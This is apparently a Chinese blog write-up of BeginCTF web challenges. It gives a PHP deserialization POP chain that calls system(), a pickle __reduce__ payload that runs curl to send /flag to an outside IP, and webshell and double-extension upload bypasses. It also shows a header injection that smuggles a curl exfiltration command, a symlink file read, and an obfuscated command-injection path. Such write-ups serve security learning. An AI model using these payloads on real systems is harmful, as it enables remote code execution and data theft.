POPgadget

<?php

highlight_file(__FILE__);
class Fun{
    public $func = 'call_user_func_array';
    public function __call($f,$p){
        var_dump($f);
        var_dump($p);
        call_user_func($this->func,$f,$p);
    }
}

class Test{
    public function __call($f,$p){
        echo getenv("FLAG");
    }
    public function __wakeup(){
        echo "serialize me?";
    }
}

class A {
    public $a;
    public function __get($p){
        if(preg_match("/Test/",get_class($this->a))){
            return "No test in Prod\n";
        }
        return $this->a->$p();
    }
}

class B {
    public $p;
    public function __destruct(){
        $p = $this->p;
        echo $this->a->$p;
    }
}
/*
if(isset($_REQUEST['begin'])){
    unserialize($_REQUEST['begin']);
}*/

$payload = new B();
$payload->a = new A();
$payload->p = 'env';
$payload->a->a = new Fun();
$payload->a->a->func = 'system';
$ans = serialize($payload);
echo $ans;
?>

很简单的pop链，不分析了。主要是system的第二个参数可以是一个空数组。

pickelshop

有/api/register、/api/login和/pickelshop三个路由
在/api/register进行注册得到cookie
user=gASVKwAAAAAAAAB9lCiMCHVzZXJuYW1llIwFYWRtaW6UjAhwYXNzd29yZJSMBWFkbWlulHUu，其实就{"username":"admin","password":"admin"}进行pickle.dump后进行base64编码后的值。然后在/api/login输入username和password进行登录，但是没有cookie就会失败。~~有username和password和对应的cookie值，不用注册也可以成功登录。~~所以f服务端一定是对我们的cookie进行了pickle.load操作的，然后和我们输入的信息进行比对。没有ban什么，直接用__reduce__执行命令。~~一定要在本地load自己的payload确保可行，自己本地都执行不了就别对着靶机狂冲了~~

import base64
import pickle
import urllib
class genpoc(object):
    def __reduce__(self):
        cmd = 'curl -d @/flag 124.221.19.214:2333'  # 要执行的命令
        s = "__import__('os').popen('{}').read()".format(cmd)
        return (eval, (s,))  # reduce函数必须返回元组或字符串

poc = pickle.dumps(genpoc())
print(base64.b64encode(poc))

zupload

直接?action=/flag就可以了

zupload-pro

是前端的验证，禁用js或先把木马改zip抓包改回php

zupload-pro-plus

backdoor.zip.php绕过

zupload-pro-plus-max

先写个木马，然后压缩为zip，上传然后include包含即可执行命令

zupload-pro-plus-max-ultra

在post的请求头增加X-Extract-To: /var/www/html;curl -d @/flag 124.221.19.214:2333;即可

zupload-pro-revenge

和zupoad-pro一样

zupload-pro-plus-enhanced

1.zip.php绕过

zupload-pro-plus-max-ultra-premium

创建一个指向/flag的软链接

ln -s /flag flag
zip --symlinks flag.zip flag

上传访问/uploads/flag即可

sql教学局

union查询，不多讲

readbooks

public路由是读文件，list路由是列出文件

/public/`'ec''ho'${IFS}'L19mbGFn'|'ba''se64'${IFS}-d`

BeginCTF

POPgadget

pickelshop

zupload

zupload-pro

zupload-pro-plus

zupload-pro-plus-max

zupload-pro-plus-max-ultra

zupload-pro-revenge

zupload-pro-plus-enhanced

zupload-pro-plus-max-ultra-premium

sql教学局

readbooks

king

添加新评论取消回复

页面

分类

BeginCTF

POPgadget

pickelshop

zupload

zupload-pro

zupload-pro-plus

zupload-pro-plus-max

zupload-pro-plus-max-ultra

zupload-pro-revenge

zupload-pro-plus-enhanced

zupload-pro-plus-max-ultra-premium

sql教学局

readbooks

king

添加新评论取消回复

BeginCTF